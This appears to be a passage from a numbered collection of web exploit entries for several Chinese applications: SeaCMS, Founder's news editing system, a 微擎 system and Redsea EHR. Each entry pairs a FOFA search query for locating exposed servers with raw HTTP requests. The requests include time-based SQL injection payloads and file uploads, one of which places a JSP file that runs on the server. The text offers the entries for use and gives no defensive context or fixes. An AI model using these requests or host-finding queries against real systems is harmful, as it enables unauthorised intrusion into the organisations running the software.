200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 Omnimedia News Editing System binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云 EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--